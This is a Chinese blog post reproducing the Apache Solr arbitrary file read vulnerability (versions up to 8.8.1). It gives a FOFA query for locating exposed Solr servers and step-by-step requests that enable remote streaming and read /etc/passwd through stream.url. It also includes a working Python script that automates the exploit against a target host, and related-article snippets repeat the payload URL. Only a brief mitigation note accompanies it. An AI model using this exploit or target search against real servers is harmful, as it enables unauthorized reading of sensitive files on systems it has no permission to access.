Apache Solr 任意文件读取漏洞

最新推荐文章于 2024-05-12 14:14:04 发布
最新推荐文章于 2024-05-12 14:14:04 发布
阅读量2.1k 收藏 2
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dahege666/article/details/116594966
版权

环境搭建

下载后解压,然后把server中的JAR拷贝到example中然后CMD打开bin目录下的solr.cmd,访问 http://ip:8093(默认)

Apache Solr简介

Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。它是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果

一、漏洞描述

Apache Solr存在任意文件读取漏洞攻击者可以在未授权的情况下获取目标服务器敏感文件

二、漏洞影响

Apache Solr <= 8.8.1

三、漏洞复现

FOFA语句

app="apache-Solr"

访问 Solr Admin 管理员页面

http://xxx.xxx.xxx.xxx/solr/admin/cores?indexInfo=false&wt=json

 

发送数据直接访问/solr/edge_index_shard1_replica1/config 

edge_index_shard1_replica1/这个是获取到的name,后面接上config

 

然后访问 /solr/edge_index_shard1_replica1/debug/dump?param=ContentStreams

然后再抓包,在下面添加 stream.url=file:///etc/passwd   再把GET转换为POST发送

成功读取passwd文件

 

 

#!/usr/bin/python

# coding: UTF-8

import requests

 

host="http://192.168.1.79:8081/"

if host[-1]=='/':

    host=host[:-1]

def get_core(host):

    url=host+'/solr/admin/cores?indexInfo=false&wt=json'

    core_data=requests.get(url,timeout=3).json()

    if core_data['status']:

        core=core_data['status'].keys()[0]

        jsonp_data={"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":'true'}}

        requests.post(url=host+"/solr/%s/config"%core,json=jsonp_data)

 

        result_data=requests.post(url=host+'/solr/%s/debug/dump?param=ContentStreams'%core,data={"stream.url":"file:///etc/passwd"}).json()

        if result_data['streams']:

            print result_data['streams'][0]['stream']

    else:

        exit("不存在此漏洞")

get_core(host)

修复建议

由于官方拒绝修复该漏洞,因此请将Apache solr在内网中启动,若需要在公网中使用,需要限制访问ip。

 

我是哥哥。
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Apache Solr 任意文件读取漏洞详细解析
髣髴兮若轻云之蔽月
04-28 2007
Apache Solr简介 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 PS:XML是一个文本文件,类似于HTML是一种标记语言。 API(Application Programming Interface,应用程序编程接口)是一些预先定义的函数,目的是提供应用程序与开发人员基于某软件或硬件得以访问一组例程的
Apache Solr漏洞总结(比较全面的哦)
热门推荐
yangbz123的博客
06-11 1万+
目录框架概述Wiki百科百度百科漏洞列表1.远程命令执行RCE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案2.远程命令执行XXE(CVE-2017-12629)漏洞详情漏洞复现影响版本修复方案3.任意文件读取AND命令执行(CVE-2019-17558)漏洞详情漏洞复现3.1代码执行3.2任意文件读取影响版本修复方案4.远程命令执行漏洞(CVE-2019-0192)漏洞详情漏洞复现影响版本修复方案5.远程命令执行漏洞(CVE-2019-0193)漏洞详情漏洞复现影响版本修复方案6.未授权
其他的 框架安全:Apache Solr 远程代码漏洞.(CVE-2019-0193)
最新发布
网络安全领域___专研者.
05-12 761
Apache Solr是一个开源的搜索服务,便用Java语言开发,主要基于 HTTP 和ApacheLucene 实现的。Sor是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。
1.Apache Solr介绍、下载及其安装
相互学习 共同进步
05-21 1444
Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-Service的API接口 Solr具有高度的可靠性、可伸缩性和容错能力。提供分布式索引、复制和负载均衡查询、自动故障转移和恢复、集中式配置等。Solr为许多世界上的互联网站点提供搜索和导航功能
Apache Solr 任意文件读取
weixin_43749601的博客
04-11 5034
简介 SolrApache Lucene项目的开源企业搜索平台。其主要功能包括全文检索、命中标示、分面搜索、动态聚类、数据库集成,以及富文本(如Word、PDF)的处理。Solr是高度可扩展的,并提供了分布式搜索和索引复制。Solr是最流行的企业级搜索引擎,Solr 4还增加了NoSQL支持。 Solr是用Java编写、运行在Servlet容器(如Apache Tomcat或Jetty)的一个独立的全文搜索服务器。 Solr采用了Lucene Java搜索库为核心的全文索引和搜索,并具有类似REST的HT
solr漏洞合集
weixin_46626737的博客
07-02 848
在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)在根据名字构造链接,进行访问,post传参:(验证是否存在漏洞poc)漏洞版本:Apache Solr 5.0.0 ~8.3.1。漏洞版本:Apache Solr < 8.2.0。3.solr远程代码执行(CVE-2017-12629)5.solr的XXE漏洞(CVE-2017-12629)2.solr远程代码执行(CVE-2019-0193)漏洞版本:Apache Solr < 7.1。漏洞版本:Apache Solr < 7.1。
Apache Solr 存在任意文件读取
逗比大师的博客
04-09 152
访问:http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd (db为存在的应用名)
Apache Solr远程命令执行漏洞
weixin_44897902的博客
11-03 2873
呜呜呜呜呜大佬们都太猛了,我就晚了半天,基本上所有的站都被大佬们x了个遍…呜呜呜呜呜 但是即便是在这样的情况下,我还是捡了个漏,好了好了,开始了 漏洞名称: Apache Solr远程命令执行漏洞Apache Solr Velocity模板注入RCE漏洞漏洞危害: 远程命令执行,容易被人getshell,使自己的服务器成为别人的肉鸡… 产生原因(攻击前提): 能够直接访问solr控制台,那么...
Apache Solr 任意文件读取.py
06-07
Apache Solr RemoteStreaming 任意文件读取和SSRF
Apache-Solr-EXP:Apache Solr任意文件读取EXP
03-20
这个“Apache-Solr-EXP”项目关注的是一个特定的安全漏洞,即Apache Solr任意文件读取漏洞。该漏洞允许攻击者通过精心构造的请求访问服务器上的任意文件,这可能对系统的安全性构成严重威胁。 在Python 3.8或更高...
Apache Solr最新版任意文件读取0day1
08-03
Apache Solr 是一个流行的开源全文搜索引擎,...总之,Apache Solr任意文件读取漏洞是值得注意的安全问题,尤其是在默认配置下运行的系统。为了系统的安全性,管理员应该实施严格的访问控制策略,并保持软件的更新。
Apache Solr组件安全概览1
08-03
近年来,Apache Solr曝出过多个高危漏洞,包括但不限于任意文件读取、远程代码执行等。这些漏洞可能被攻击者利用,影响系统的稳定性和数据安全性。文章末尾提到的一个全版本任意文件读取漏洞,官方拒绝修复,用户需...
[HACK学习呀] - 2019-11-02 Apache Solr最新RCE批量验证1
08-03
在2019年11月,Apache Solr被发现存在一个远程代码执行(RCE)漏洞,该漏洞允许攻击者通过精心构造的请求在受影响的Solr服务器上执行任意代码。这个漏洞主要影响Apache Solr的8.2.0版本及其之前版本。 漏洞的原理是...
Apache Solr stream.url 存在任意文件读取漏洞
nnn2188185的博客
04-17 343
Apache Solr是一个开源的搜索服务,使用Java语言开发。Apache Solr的某些功能存在过滤不严格,在Apache Solr未开启认证的情况下,攻击者可直接构造特定请求开启特定配置,并最终造成SSRF或文件读取漏洞
Apache Solr RemoteStreaming 任意文件读取
Li-D的博客
06-07 383
漏洞描述 Solr是一个独立的企业级搜索应用服务器,它对外提供类似于Web-service的API接口。用户可以通过http请求,向搜索引擎服务器提交一定格式的XML文件,生成索引;也可以通过Http Get操作提出查找请求,并得到XML格式的返回结果。 Apache Solr是一个开源搜索服务引擎,攻击者可以在未授权的情况下构造恶意HTTP请求读取目标Apache Solr服务器的任意文件。 影响版本 Apache Solr <= 8.8.1 环境搭建 开启docker-compose环
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
weixin_44047654的博客
03-03 1625
Apache Solr 远程命令执行漏洞(CVE-2019-0193)
Apache Solr 任意文件读取漏洞(CNVD-2021-30146)
weixin_44047654的博客
02-22 224
Apache Solr 任意文件读取漏洞(CNVD-2021-30146)
漏洞复现】Apache系列(二)之Solr漏洞复现
qq_45244158的博客
03-01 7379
漏洞复现】Apache系列(二)之Solr漏洞复现
Apache Solr 教程_编程入门自学教程_菜鸟教程-免费教程分享
banzhuan_it的博客
06-07 771
Apache Solr 是一个开源搜索服务器。Solr 是用 Java 语言开发的,主要基于 HTTP 和 Apache Lucene 实现。存储在 Apache Solr 中的资源存储为 Document 对象。Apache Solr入门教程- 从基本概念开始,简单易学地了解Apache Solr,其中包括概述,搜索引擎基础知识,Windows环境,Hadoop,架构,术语,基本命令,核心,索引数据,添加文档( XML),更新数据,删除文档,检索数据,查询,分面。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值